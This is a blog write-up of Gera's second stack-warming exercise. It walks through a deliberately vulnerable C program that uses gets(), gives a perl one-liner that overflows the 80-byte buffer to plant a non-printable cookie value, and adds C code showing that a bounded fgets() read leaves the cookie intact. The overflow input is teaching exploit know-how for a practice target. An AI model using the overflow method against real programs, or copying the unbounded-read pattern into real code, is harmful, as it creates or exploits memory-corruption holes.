## Thursday, December 23, 2010

### Warming up to the stack #2

```c
#include <stdio.h>

int main() {
  int cookie;
  char buf[80];

  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);                      /* unbounded read: this is the challenge's bug */
  if (cookie == 0x01020305)
    printf("you win!\n");
}
```

Gera's challenge #2 is exactly the same as the first one apart from the cookie value we need to write. What makes this one interesting is that the bytes of that value are not "printable": they have no symbolic representation you can type directly.

There are a few ways to deal with this:
• Take a file similar to the one used for the first challenge and use a hex editor, like hexcurse(1), to modify the trailing bytes by hand.
• Use inline perl: `perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'`
• Enter the special characters directly with Ctrl+V followed by a Ctrl+key, where the key is the character with code 0x40 + the byte value (so 0x05 is Ctrl+E). This won't necessarily work on your terminal due to the Ctrl + C

```
% ./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!
```
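The layout the challenge relies on, and the bounded read that closes the hole, as an added example; this is not Gera's code or anything from the original post. It assumes a little-endian x86 host, which is also what the printed addresses imply (buf at bfbfe9e8, cookie at bfbfea38, exactly 0x50 = 80 bytes apart, so the cookie sits directly after the buffer). The `struct frame`, `le32`, `read_line_bounded`, `cookie_survives` and `demo_bounded_read` names are mine, and the 0xdeadbeef sentinel and the 80 bytes of 'q' filler are constructed test data.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not from the post): the challenge's frame made explicit as a
 * struct, so the 80-byte buffer is followed immediately by the cookie instead
 * of depending on how the compiler happens to order two locals. */
struct frame {
    char buf[80];
    unsigned int cookie;
};

/* Decode four bytes as a little-endian 32-bit value. This is why the winning
 * cookie 0x01020305 has to be sent as the byte string \x05\x03\x02\x01:
 * the least significant byte is stored first. */
unsigned int le32(const unsigned char *p) {
    return (unsigned int)p[0] | ((unsigned int)p[1] << 8) |
           ((unsigned int)p[2] << 16) | ((unsigned int)p[3] << 24);
}

/* The fix for the gets() call: fgets() stores at most size-1 bytes and always
 * NUL-terminates, so whatever follows the buffer is never written. The
 * newline, if one was read, is dropped. Returns bytes stored, or -1 on EOF. */
int read_line_bounded(char *buf, size_t size, FILE *in) {
    if (fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t n = strcspn(buf, "\n");
    buf[n] = '\0';
    return (int)n;
}

/* Feed a constructed input line to the bounded reader through a temporary
 * file standing in for stdin, then report whether the cookie that sits right
 * after the buffer kept its value: 1 = intact, 0 = clobbered, -1 = I/O error. */
int cookie_survives(const unsigned char *line, size_t len) {
    struct frame f;
    f.cookie = 0xdeadbeef;          /* constructed sentinel, not the challenge value */

    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    if (fwrite(line, 1, len, in) != len) {
        fclose(in);
        return -1;
    }
    rewind(in);

    int n = read_line_bounded(f.buf, sizeof f.buf, in);
    fclose(in);
    return n >= 0 && f.cookie == 0xdeadbeef;
}

/* Build the same 84-byte line the perl one-liner produces (80 filler bytes
 * plus the four cookie bytes) and run it against the bounded reader. */
int demo_bounded_read(void) {
    unsigned char payload[84];
    memset(payload, 'q', 80);
    memcpy(payload + 80, "\x05\x03\x02\x01", 4);
    return cookie_survives(payload, sizeof payload);
}

int main(void) {
    const unsigned char tail[4] = { 0x05, 0x03, 0x02, 0x01 };
    printf("tail bytes decode to %08x\n", le32(tail));
    printf("cookie survives bounded read: %d\n", demo_bounded_read());
    return 0;
}
```

With the 84-byte line, `fgets` stops after 79 bytes, the 80th slot holds the terminator, and the cookie never changes; with `gets` the same line runs straight through the buffer into it. The same holds for `fgets(buf, sizeof buf, stdin)` dropped into the original program, and compiling with a stack protector adds a second check that does not depend on getting the bound right.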